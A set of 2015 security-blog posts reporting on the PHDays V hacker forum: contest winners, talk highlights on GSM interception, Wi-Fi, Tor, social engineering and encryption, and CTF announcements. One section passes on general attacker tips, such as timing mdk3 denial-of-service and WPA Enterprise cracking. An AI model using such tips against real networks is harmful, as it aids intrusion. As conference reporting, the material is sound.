bushwhackers: Georgy Noseevich, Andrey Petukhov, and Alexander Razdobarov. The team solved all the tasks during the first day! (They won last year's competition as well.) Mikhail Stepankin (ArtSploit) took second place, and Eldar Zaitov (kyprizel) was third. The winner received an iPad Air 2; a Sony Xperia Z3 went to the second-place team; the third-place team received a license for Burp Suite Professional.<br /><br />During the contest, <b>271,390 </b>requests were blocked (twice as many as during last year's contest). This time, <b>302</b> contestants registered (compared to 101 last year). Only <b>18 participants</b> managed to capture at least one flag.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--62KXZVzf9I/VW8RyVn3jHI/AAAAAAAAFCY/2kUtlWn7mJw/s1600/waf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="http://1.bp.blogspot.com/--62KXZVzf9I/VW8RyVn3jHI/AAAAAAAAFCY/2kUtlWn7mJw/s640/waf4.png" width="640" /></a></div><br /><br />Thanks to everyone who took part in the contest.<br /><br /></div>Unknownnoreply@blogger.com597tag:blogger.com,1999:blog-5176771794789502609.post-49408747316673187762015-06-02T19:27:00.000+03:002015-07-03T13:54:37.341+03:00PHDays V Highlights: Signs of GSM Interception, High Time to Hack Wi-Fi, Future of Encryption<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UJIcmg97seA/VW3Tpu9CGRI/AAAAAAAAE-k/Iz6lm4esvEQ/s1600/phd2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-UJIcmg97seA/VW3Tpu9CGRI/AAAAAAAAE-k/Iz6lm4esvEQ/s640/phd2.png" width="640" /></a></div><br />Technological singularity is expected in 15 years at best, but the Positive Hack Days transformation is happening right now. 
The fifth forum had a record attendance – over 3,500 visitors, which is comparable to the leading international hacker conferences, and the number of talks, sessions, and various activities surpassed one hundred. The incredible and exciting contests involved hacking spaceships, power plants, ATMs, and railway companies. More Smoked Leet Chicken became the champion of this year’s CTF, excelling at stock exchange speculation. Congratulations! A detailed write-up about that is coming soon. Right now let’s focus on a number of recommendations and tips that impressed us most during the two-day hacker marathon that took place at the World Trade Center on May 26-27.<br /><a name='more'></a><br /><b><span style="font-size: large;">Color of the Day vs Social Engineering</span></b><br /><br />Chris Hadnagy, the founder of <i>social-engineer.org</i>, talked about his experience in protecting businesses against social hackers during his speech called “Social Engineering for Fun and Profit”. One of his stories was about a pregnant girl, a social engineer by profession, who, carrying a heavy box, managed to get inside an office protected by various identification systems and penetrated its most critical part — a server room. Pregnant women look so vulnerable, don't they? <br /><br />He also pointed out that while techniques change, people remain the same, and there is no need to fight the very essence of human nature and become heartless robots. Instead, he showed how to turn it against social hackers. One of the ways is to implement a Color of the Day routine, so that the color is known to employees only. When an adversary attempts a vishing attack pretending to be an IT or HR specialist, you just need to ask him or her the color of the day, as a kind of password, to ward off impostors. You use ID cards to enter your office, and it is all right to implement similar IDs for all access points. 
<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-uXzpc__b094/VW3T1zzId8I/AAAAAAAAE-s/7X3e1KUA768/s1600/phd3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="http://1.bp.blogspot.com/-uXzpc__b094/VW3T1zzId8I/AAAAAAAAE-s/7X3e1KUA768/s640/phd3.png" width="640" /></a></div><br /><b><span style="font-size: large;">Find Out if Someone Is Listening on Your Phone </span></b><br /><br />During his talk called “GSM Signal Interception Protection”, Sergey Kharkov described signs of wiretapping and all sorts of hardware and software diagnostic tools. For example, to carry out an interception, an attacker needs to make your device connect to his or her virtual cell; otherwise the phone might find a better alternative. So one of the sure signs that your device has connected to an adversary’s virtual cell is a strong signal and an unnaturally high C2 value, the parameter responsible for prioritizing one cell over another.<br /><br />PHDays V participants paid a lot of attention to mobile security. Dmitry Kurbatov, a Positive Technologies expert, held a hands-on lab, after which anyone was able to participate in the MiTM Mobile contest and try to hack a mobile operator created for the contest. Participants could do a lot of things, like intercepting SMS, USSD, and phone conversations, working with an IMSI catcher, cracking encryption keys using kraken, and cloning cell phones. A write-up of the contest highlights is coming soon.<br /><br /><b><span style="font-size: large;">Why Hackers Attack the Olympics</span></b><br /><br />Among the participants of a round table dedicated to incident investigation in large infrastructures were Vladimir Kropotov, Fyodor Yarochkin, Kevin Williams, John Bambenek, and other infrastructure protection experts. 
For instance, Kevin, as a British NCCU employee, helped to protect the Olympic Games in London, while Vladimir represented Positive Technologies, which helped to protect VGTRK, a state television and radio broadcasting company in Russia, during the 2014 Olympics. Fyodor Yarochkin noted that along with the usual threats like hacktivists and hooligans came the most dangerous type of adversary — various forms of criminal business related to totalizators, since any change might help them hit the jackpot. Kevin Williams discussed in detail the common practice in the UK of coordinating efforts with CERTs, which act as mediators between state departments and companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-7VF9TCiuTVs/VW3UC920rzI/AAAAAAAAE-0/33kLzgRi6k8/s1600/phd5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="http://4.bp.blogspot.com/-7VF9TCiuTVs/VW3UC920rzI/AAAAAAAAE-0/33kLzgRi6k8/s640/phd5.png" width="640" /></a></div><br /><b><span style="font-size: large;">How to Help Intrusion Prevention Systems</span></b><br /><br />Hackers have learned how to confuse self-learning mechanisms in network intrusion detection systems. Clarence Chio, an artificial intelligence specialist, reviewed several models applied in IPSs, based on PSA, clustering, and so on. Which is better — rule-based techniques or machine self-learning mechanisms? 
Clarence Chio believes that ML techniques look good in theory, but when it comes to real-life action they fail to impress.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BoxMzGb24EM/VW3UKCkrO0I/AAAAAAAAE-8/l_BWyeQ-FMc/s1600/phd6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://2.bp.blogspot.com/-BoxMzGb24EM/VW3UKCkrO0I/AAAAAAAAE-8/l_BWyeQ-FMc/s640/phd6.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GfdfbQhgnng/VW3UNrTjXXI/AAAAAAAAE_E/jgf9dzAKf7o/s1600/phd7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="http://1.bp.blogspot.com/-GfdfbQhgnng/VW3UNrTjXXI/AAAAAAAAE_E/jgf9dzAKf7o/s640/phd7.png" width="640" /></a></div><br /><br /><b><span style="font-size: large;">The Most Secure Mobile Platform Around</span></b><br /><br />The information security experts Denis Gorchakov and Nikolay Goncharov shared, among other things, information about the most secure mobile OS in their report called “Fighting Payment Fraud Within Mobile Networks”. The first place went to Windows Phone, for which no critical malware epidemics have been registered yet. As for iOS, there are a number of applications that attack devices with or without a jailbreak. Android, being the most popular mobile OS, turned out to be the worst. According to the Android Security Report 2015, the rate of malicious software found is 3 to 4 times above the average in Russia.<br /><br /><b><span style="font-size: large;">Edward Snowden in Your Keyboard </span></b><br /><br />Not only may wireless keyboards discharge when you least expect it, they also have the potential to disclose your confidential data. 
Andrey Biryukov, a system architect at MAYKOR, told us about the concept of KeySweeper — a simple Arduino-based device in the shape of a charger that captures the signals of keys pressed on a wireless keyboard and sends the data to an attacker. Usual computer scanning will help you detect viruses and vulnerabilities on your PC, yet it fails to protect against KeySweeper. <br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-M9CSmj6_Qc8/VW3UZc5DFqI/AAAAAAAAE_M/0wrbsAI_8e4/s1600/phd9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="http://2.bp.blogspot.com/-M9CSmj6_Qc8/VW3UZc5DFqI/AAAAAAAAE_M/0wrbsAI_8e4/s640/phd9.png" width="640" /></a></div><br /><b><span style="font-size: large;">Victim’s Browser as a Scanning Tool</span></b><br /><br />Dmitry Boomov, a respected deanonymization specialist, told the audience how to scan internal infrastructures via a victim’s browser without using JavaScript during his report called “Not by Nmap Alone”. 
All you need is to make a victim click on the right link.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AH_DtUAtEDQ/VW3Vk2vBv-I/AAAAAAAAE_Y/kfpP_rmkGmw/s1600/phd10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="406" src="http://1.bp.blogspot.com/-AH_DtUAtEDQ/VW3Vk2vBv-I/AAAAAAAAE_Y/kfpP_rmkGmw/s640/phd10.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RFwDsYkB6-w/VW3XoYygd1I/AAAAAAAAE_k/5lfYzGDuSfI/s1600/phd11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://4.bp.blogspot.com/-RFwDsYkB6-w/VW3XoYygd1I/AAAAAAAAE_k/5lfYzGDuSfI/s640/phd11.png" width="640" /></a></div><br /><b><span style="font-size: large;">Best Time to Catch Wi-Fi</span></b><br /><br />In his report “Overview of Little-Known Wi-Fi Nuances”, the researcher Oleg Kupreev drew our attention to the time and weather conditions most comfortable for hackers to strike. A high-frequency signal is weaker on rainy days, so a potential attacker will most definitely choose another day to attack thousands of users near the subway. It makes more sense to go on a DDoS hunt on WTS via mdk3 deep in the night. Not only is it inconvenient to attempt it in the evening (the only non-overlapping channels are 1, 6, and 11), it is also quite reckless – a traffic overload every five minutes may raise suspicions if the victim is watching TV online. 
Mornings, when office PCs are turned on, are the best time to crack WPA Enterprise.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-fHC8hxooEYo/VW3Xt763p8I/AAAAAAAAE_s/yg6S68QSrDM/s1600/phd12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="http://2.bp.blogspot.com/-fHC8hxooEYo/VW3Xt763p8I/AAAAAAAAE_s/yg6S68QSrDM/s640/phd12.png" width="640" /></a></div><br /><b><span style="font-size: large;"> How to Make Vendors Patch Vulnerabilities</span></b><br /><br />In March, FSTEC of Russia made its official vulnerability database, comprising more than 150 threats and 10,000 vulnerabilities, public. Vitaly Lyutikov, the head of FSTEC of Russia, mentioned during the round table called "Expert Community's Role in Generation of Information Security Threat Databases" that the national database was the result of a law prohibiting Russian documents from referring to third-party CVE definitions. FSTEC of Russia is now responsible for checking zero-day vulnerabilities and for correspondence with vendors.<br /><br /><b><span style="font-size: large;">Onion Vulnerabilities</span></b><br /><br />Protecting onion resources on the DarkNet is not that easy. The Kaspersky Lab experts Denis Makrushin and Maria Garnaeva told us what kind of information external observers may obtain about a Tor user. Denis developed a passive system for exit node traffic collection with one key feature: it relayed traffic on all ports and contained a sniffer that captured every HTTP connection carrying a Referer header. If a person inside Tor clicks a link to an external web resource, this packet gets captured. The discovered sites usually contained ads about passwords and legacy databases. 
The authors of "The End of Anonymity on Anonymous Networks" also found that every third onion resource has security flaws and allows arbitrary JavaScript code execution.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PfCLTrO5Ccw/VW3X2q_VeWI/AAAAAAAAE_0/ZXkCpSATJrI/s1600/phd13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="http://1.bp.blogspot.com/-PfCLTrO5Ccw/VW3X2q_VeWI/AAAAAAAAE_0/ZXkCpSATJrI/s640/phd13.png" width="640" /></a></div><br /><b><span style="font-size: large;">Hunting Lost Configuration Files</span></b><br /><br />Hardly anyone can hold your attention for as long as Andrey Masalovich, a faithful participant of Positive Hack Days — after an hour the audience still couldn't stop listening to the competitive intelligence expert, so we had to extend his talk "Zero Shades of Grey". Having shared one of his relatively honest ways to access website logins, passwords, and databases (figuring out the name of a backup copy of a CMS configuration file forgotten by a system administrator), he focused on a very important topic — questioning the authenticity of multimedia, graphic, and text data. <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N1PWhw8J_aA/VW3YCg0f7iI/AAAAAAAAE_8/3peh7xPJeHY/s1600/phd16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="350" src="http://1.bp.blogspot.com/-N1PWhw8J_aA/VW3YCg0f7iI/AAAAAAAAE_8/3peh7xPJeHY/s640/phd16.png" width="640" /></a></div><br /><b><span style="font-size: large;">Check If Photos are Photoshopped</span></b><br /><br />The contest held by Almaz Capital for startup cybersecurity projects touched upon data authenticity as well. 
Participants were not required to have established a company, but they did need to provide a prototype of their solution.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-PLNGimuI9H0/VW3YK9lvu4I/AAAAAAAAFAE/JY7hxvh0rEE/s1600/phd17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="http://4.bp.blogspot.com/-PLNGimuI9H0/VW3YK9lvu4I/AAAAAAAAFAE/JY7hxvh0rEE/s640/phd17.png" width="640" /></a></div><br />The first prize (1,500,000 rubles) went to <a href="http://www.smtdp.com/" target="_blank">SMTDP Tech</a>, a company that invented an anti-photoshop tool to detect changes in photos and videos. If you need to check a static billboard or car accident photos, this software may help. <br /><br /><b><span style="font-size: large;">Future of Encryption</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qU5IDvZ1xQU/VW3YWtt7OnI/AAAAAAAAFAM/uYomdrB76bs/s1600/phd18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://2.bp.blogspot.com/-qU5IDvZ1xQU/VW3YWtt7OnI/AAAAAAAAFAM/uYomdrB76bs/s640/phd18.png" width="640" /></a></div><br />Whitfield Diffie, an advisor to Almaz Capital and the father of digital signatures and asymmetric encryption, made his forecast from the PHDays plasma displays on May 26. He believes that if we were spending as much money on actual defense as we spend on interactive attack systems, we might get much better results, build digital fortresses, and level up information security. Today quantum key distribution shows great promise for solving transportation problems, but nobody knows exactly what it will look like. We can only assume that radio or vibration communication will be implemented. 
Another debated technology, which Whitfield Diffie views skeptically, is homomorphic encryption — a user's computer might not be powerful enough to decrypt a message.<br /><br /><b><span style="font-size: large;">Linguists to Come Out of the Shadow</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-vNqwEql4sG0/VW3Yht_0Y2I/AAAAAAAAFAU/feDy3Mq6QeA/s1600/phd19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://3.bp.blogspot.com/-vNqwEql4sG0/VW3Yht_0Y2I/AAAAAAAAFAU/feDy3Mq6QeA/s640/phd19.png" width="640" /></a></div><br />In the session "<a href="http://www.phdays.com/program/business/40912/" target="_blank">Information Security: Careers of the Future</a>", its moderator, Positive Technologies expert Evgeny Minkovsky, along with business and government officials, tried to foresee our future as well. What information security jobs and technologies will be most in demand in five or fifteen years? The voting results at the end of the meeting surprised the participants — sooner or later information security will show high demand for linguists. This point of view corresponds to the Atlas of New Professions by the Agency for Strategic Initiatives, which placed digital linguistics among the most promising professions. 
These specialists will develop semantic translation and text processing systems and new communication interfaces between PCs and human beings.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--G4qZhRTnZM/VW3YqvWq6gI/AAAAAAAAFAc/I8zqyC77DJM/s1600/phd20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://2.bp.blogspot.com/--G4qZhRTnZM/VW3YqvWq6gI/AAAAAAAAFAc/I8zqyC77DJM/s640/phd20.png" width="640" /></a></div><br />You may find videos of all the PHDays reports on the forum’s site <a href="http://www.phdays.com/broadcast/">http://www.phdays.com/broadcast/</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-z4_7bAqEehE/VW3Y8Q_mlFI/AAAAAAAAFAk/Qs-dpGrccU4/s1600/phd21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://3.bp.blogspot.com/-z4_7bAqEehE/VW3Y8Q_mlFI/AAAAAAAAFAk/Qs-dpGrccU4/s640/phd21.png" width="640" /></a></div></div>Unknownnoreply@blogger.com203tag:blogger.com,1999:blog-5176771794789502609.post-70862623231670123392015-05-29T10:36:00.000+03:002015-05-29T10:36:10.195+03:00PHDays V. Day First: How to Intercept SMS and Hack Satellite<div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days launched on May 26, and on the very first day, cybersecurity experts demonstrated various techniques that are used to hack ATMs, online banking systems, mobile carriers' networks, and energy, transport, and industrial companies. More than 50 reports were presented at the World Trade Center. A number of hands-on labs and round tables were held as well. The organizer provided several video streams to broadcast the most interesting events on the forum's website.<br /><br />Damage caused by a cyberattack can be measured in billions of dollars, while its actual cost is rather low. 
According to the Positive Research center, anyone with less than 10,000 dollars is able to gain remote access to somebody else's SIM card, which means access to the subscriber's traffic, SMS, calls, and location data. Twenty percent of SIM cards are vulnerable to such attacks. It is also possible to obtain a subscriber's confidential information by attacking his mobile carrier's equipment. An attack on a GSM cell can cost about 1,000 dollars. To hack a base station, an intruder might need only a PC and access to the SS7 network.<br /><a name='more'></a><br />Banking systems keep pace with the telecommunications sector. An ATM can hold 10 million rubles. And when it comes to hacking the cash machine, you might only need a Raspberry Pi for $60. Last year, Russia took second place in the world (after Palestine) for the number of ATMs that can be detected by special search engines and remotely reprogrammed by using insecure protocols and exploiting numerous vulnerabilities in Windows XP. The situation with e-money is not much better.<br /><br />In 2014, 70% of Android applications and 50% of iOS apps contained vulnerabilities that gave access to an e-money account.<br /><br />Devices that seem harmless at first sight, such as wireless USB modems, can also pose a danger to users. Mobile operating system developers are quick at fixing vulnerabilities, while modem firmware developers haven't paid much attention to security until recently. According to Positive Technologies researchers, 27 out of 30 firmwares contained critical vulnerabilities. Timur Yunusov presented a report that reveals how easy it is for an intruder to enable automatic identification and infection of 4G modems in order to intercept traffic, manipulate an account and SMS, and break into a computer connected to such a modem.<br /><br />The philosophical conception of PHDays V involved certain elements of cosmological theories. 
However, practical aspects were also of interest, which is why the forum's organizer held the session named Amateur Radio for Space Communication. Speakers discussed the information security of space stations; in particular, they discussed the Fobos-Grunt crash, considering a version based on external influence. The radio amateur Dmitry Pashkov claims that it is quite possible to jam signals between a control center and a spacecraft. You will find the necessary equipment in any electronics store, except for an antenna: you'll have to make that yourself. Using homemade devices, Dmitry managed to obtain solar eclipse images from Meteor-M No. 2 (a Roscosmos satellite) and to get the most up-to-date weather forecast.<br /><br /><b><span style="font-size: large;">How to Protect</span></b><br /><br />A more effective fight against vulnerabilities in information systems and measures for the protection of national interests were discussed at the most "governmental" section — Today's Russia in Unfriendly Cyberworld.<br /><br />Dmitry Finogenov (FSB department #8), Alexander Radovitsky (RF Ministry of Foreign Affairs), Alexander Baranov (Federal Tax Service), Vadim Dengin, Andrey Tumanov, and Ilya Kostunov (deputies of the State Duma) took part in the discussion. Alexey Andreev (Positive Technologies) and Alexey Lukatsky (Cisco) spoke on behalf of the expert community.<br /><br />The government officials promised that a new Russian IS concept would be published by the end of 2015. Vadim Dengin urged Russian Internet users (over 70 million people at the moment) to always be responsible for their words (in court as well) and said that the security of citizens, data privacy in particular, was the number one task for the government; therefore, the federal law on the transfer of data processing centers (DPC) to Russian territory won't be postponed. "The international business totally agrees with that," he said. 
Vadim's colleague Ilya Kostunov had recently revealed that Google Analytics was installed in all the Russian governmental bodies. Thus, he made an inquiry to the Prosecutor General's Office and Ministry of Economic Development. Ilya mentioned that Russia had had an opportunity to launch its own payment system with chip cards back in 2000.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6O6veZwosbc/VWgWwG34AjI/AAAAAAAAE7k/Ocu-xBTJQRg/s1600/new28-053.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="http://3.bp.blogspot.com/-6O6veZwosbc/VWgWwG34AjI/AAAAAAAAE7k/Ocu-xBTJQRg/s640/new28-053.jpg" width="640" /></a></div><br /> When securing data in large companies with extensive infrastructures, they say, "A chain is only as strong as its weakest link". Natalya Kukanova from Yandex mentioned in her report — Pig in a Poke: M&A Security Issues — that Yandex deducts the cost of vulnerability elimination from the profit when acquiring third-party projects.<br /><br />Not only can a large business have growth problems. There are several events traditionally held at PHDays on supporting and promoting IS ideas and solutions. Almaz Capital, a venture capital fund that was represented by managing partner Alexander Galitsky and general partner Geoffrey Baehr, organized an open contest among startups in IS. 
Moreover, Geoffrey Baehr spoke about the 18 IS startups competing for 1.5 million rubles and gave some advice to the founders of the new companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-kzTmqUkwMFc/VWgWhYGgmVI/AAAAAAAAE7c/WLPQOoQR5XU/s1600/new28-054%2B%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-kzTmqUkwMFc/VWgWhYGgmVI/AAAAAAAAE7c/WLPQOoQR5XU/s640/new28-054%2B%25281%2529.jpg" width="640" /></a></div><br /><div style="text-align: center;"><i>Photo @<a href="https://twitter.com/AlmazCapital" target="_blank">AlmazCapital</a></i></div><br />The PHDays V organizers held a round-table discussion on creating an international community of "white hats". Among the participants were the organizers of the top hacker conferences — CanSecWest (Canada), Vangelis and Power of Community (Korea), H2HC (Brazil), CodeBlue (Japan), Chaos Communication Congress (Germany), ZeroNights and PHDays (Russia).<br /><br />The first day ended with a reading of the best short stories out of the 200 works sent to the Hacked Future contest. 
Bruce Sterling, the father of cyberpunk fiction, made the decision on the final standings, and then the MDS team read out the stories about cybernetic Trojans, devourers, and head controllers to the forum participants.<br /><br />The winners of the Hacked Future contest:<br /><ul style="text-align: left;"><li>I place — Pavel Gubarev ("Uncle Zhenya")</li><li>II place — Alexander Matukhin ("Prestige")</li><li>III place — Dmitry Bogutsky ("Casting Dice")</li><li>IV place was shared between Mikhail Savelichev ("Sixty Deaths of Axis Maria"), Nikolay Murzin and Timur Denisov under the pseudonym "Rumit Kin" ("The Numb Man"), and Juliana Lebedinskaya ("Shadow and Eliza").</li></ul></div>Unknownnoreply@blogger.com283tag:blogger.com,1999:blog-5176771794789502609.post-87691819386004899512015-05-25T17:08:00.001+03:002015-05-25T17:08:49.816+03:00Making Money on Cyberwar<div dir="ltr" style="text-align: left;" trbidi="on">It is well known that insider info about the ups and downs of large corporations, if gained in time and played right, can earn you millions on the stock market. It’s hackers’ prerogative to get hold of such data or to influence a company’s activity by cracking critical business systems. So why not make some dough on your skills at Positive Hack Days V?<br /><br />This year PHDays participants will be able to become part of our virtual country — the United States of Soviet Unions (USSU) — and trade stocks on the PHDays Stock Market. All forum attendees will be able to buy and sell “company” stocks (firsthand or using a broker) and gain an advantage from insider info on the stock market.<br /><a name='more'></a><br />The hacker contest participants will be able to affect share prices by hacking railway companies, power plants, news agency sites, and other resources. In addition, successful hacking attacks may give you some useful information.<br /><br />You may spend virtual money to treat yourself to a drink in our bar or to buy souvenirs with the forum’s logo. 
For additional info, feel free to approach our specialists, who will be located next to the bar counter in the WTC Congress Hall.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-s-ZUh4rFOJc/VWMsvkIOcAI/AAAAAAAAE6c/rt1dVzAPlz4/s1600/tshirt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-s-ZUh4rFOJc/VWMsvkIOcAI/AAAAAAAAE6c/rt1dVzAPlz4/s320/tshirt.png" width="274" /></a></div><b><span style="font-size: large;">PHDays CTF</span></b><br /><br />The PHDays CTF annual international competition in information security has gained recognition due to its carefully crafted plotline and realism. This time the CTF will differ from anything you’ve seen before. The defining feature of the new event is the PHDays Stock Market. Technically, it’s a customary task-based CTF with a fair amount of innovations and assumptions.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-P5o7o3mneRA/VWMs1mM_1RI/AAAAAAAAE6k/ZjlzvfUyYDM/s1600/ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-P5o7o3mneRA/VWMs1mM_1RI/AAAAAAAAE6k/ZjlzvfUyYDM/s640/ctf.png" width="640" /></a></div><br />According to the 2015 scenario, each team will play the part of a hacker gang operating in the USSU, which has its own power industry, transportation and banking systems, telecoms, and media; at the heart of the economic and political life of the country is a stock market.<br /><br />In order to win, teams will have to accomplish various tasks distributed by the underground labor market DarkNet, e.g. 
to intercept GSM traffic between an ATM and the processor (the Leave ATM Alone contest), collide trains (Choo Choo Pwn), and uncover the CEO of a large corporation (Competitive Intelligence).<br /><br />Corporate hacks will allow you to make money by trading stocks on the PHDays Stock Market: attacks affect share prices, and the insider info obtained will help you to speculate wisely.<br /><br />You may compromise company resources via the Internet (Competitive Intelligence and WAF Bypass) or locally, while on stage (Leave ATM Alone, Hacknet, and other contests).<br /><br />Just like in real life, CTF participants may decide not to share their exploits and instead use their knowledge to get filthy rich on the stock market or to sell it on the BlackMarket hacker forum. In addition, you may get a reward for any advisory that you submit to the USSU CERT.<br /><br />For closed orders and advisories sent to the CERT, teams will receive money in virtual currency — publes. The team that receives the most publes wins.<br /><br />This year any forum participant may join the fun. If you have a ticket to PHDays and want to create a team, you may register at any moment up until the first day of the forum — May 26, 9:00 a.m. Moscow time. 
All you need is to assemble a team of three PHDays participants or more and send your info to phd [at] ptsecurity.com.<br /><br /><a href="http://www.phdays.com/program/ctf/">www.phdays.com/program/ctf/</a><br /><br /></div>Unknownnoreply@blogger.com1115tag:blogger.com,1999:blog-5176771794789502609.post-55831007888437355722015-04-29T13:29:00.000+03:002015-04-29T13:29:04.768+03:00PHDays V: How to Create Your Own Shodan, Find ROP Shellcodes, and Automate Reverse Engineering<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pr4ffsMvZ_g/VUCqTQmcMqI/AAAAAAAAExE/9M-HMyV-EL4/s1600/131e814ca6446df0c7dc5a14bf5ba037.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pr4ffsMvZ_g/VUCqTQmcMqI/AAAAAAAAExE/9M-HMyV-EL4/s1600/131e814ca6446df0c7dc5a14bf5ba037.jpg" height="426" width="640" /></a></div><br />The fifth Positive Hack Days international forum on practical security will take place in Moscow World Trade Center on May 26-27. With the second wave of Call for Papers finished, we present a new portion of reports.<br /><a name='more'></a><br /><b><span style="font-size: large;">Automation: Reverser’s Helper</span></b><br /><br />Reverse engineering often implies thorough analysis of an application system code, and the star tool here is a disassembler. 
Researchers encounter various difficulties — from deciding on the order of function processing and differences between system versions to the inability to fully debug and emulate the code in embedded systems.<br /><br />In his report Anton Dorfman, who presented a <a href="http://www.slideshare.net/phdays/anton-dorfman" target="_blank">workshop on mastering shellcode</a> at PHDays III, will share his experience in creating a reverse engineering plugin based on IDAPython, which is capable of conducting primary automated code analysis and transferring results from the system currently under research to its other versions.<br /><br /><b><span style="font-size: large;">How to Create Your Own Shodan</span></b><br /><br />The acclaimed international security specialist Igor Agievich will cover the topic of creating a search system similar to “<a href="http://www.sdcitybeat.com/sandiego/article-11458-the-worlds-most-dangerous-search-engine.html" target="_blank">the world’s most dangerous search engine</a>” — Shodan.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-whIB3woGUKw/VUCqr0LMCxI/AAAAAAAAExM/BKt2dNEdPFE/s1600/nout.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-whIB3woGUKw/VUCqr0LMCxI/AAAAAAAAExM/BKt2dNEdPFE/s1600/nout.jpg" height="360" width="640" /></a></div><br />The speaker will compare the developed system to its counterparts and give examples of curious devices detected by the new search engine.<br /><br /><b><span style="font-size: large;">Catching ROP Shellcodes in Network Traffic</span></b><br /><br />Remote vulnerability exploitation is one of the most powerful tools attackers have in their arsenal — this is how worms are spread and sensitive information is leaked. In order to bypass security measures, attackers developed a technique for constructing shellcode using return-oriented programming. 
This new type of shellcode was called ROP shellcode.<br /><br />Svetlana Gayvoronskaya, a former member of the CTF team Bushwhackers, will present a utility that conducts static and dynamic network traffic analysis to detect ROP shellcodes. Last year Svetlana, together with Ivan Petrov, presented a report on <a href="http://2014.phdays.com/program/tech/37682/" target="_blank">shellcode hunting for ARM</a>.<br /><br /><b><span style="font-size: large;">One Month Left Until PHDays</span></b><br /><br />The fifth Positive Hack Days forum on practical information security is coming up. The arrangements for PHDays V are in full swing. The organizers are putting together the competitive program and presentation schedule. You may find the previous announcements on our website (<a href="http://www.phdays.com/press/news/40211/" target="_blank">1st</a> and <a href="http://www.phdays.com/press/news/40200/" target="_blank">2nd</a>).<br /><br />In the near future, we will publish the full list of speakers, including abstracts, on the site. Follow <a href="http://www.phdays.com/press/news/" target="_blank">our newsfeed</a> so you will not miss all the juicy stuff.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-10gov4Q-nw8/VUCrndyGj3I/AAAAAAAAExc/VXZB1fJ3Ba8/s1600/183eced2478fb930fc9c6fce73113499.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-10gov4Q-nw8/VUCrndyGj3I/AAAAAAAAExc/VXZB1fJ3Ba8/s1600/183eced2478fb930fc9c6fce73113499.jpg" height="426" width="640" /></a></div><br />Even now you may vote for the most interesting presentations — click on “Want to visit” next to the report of your choice 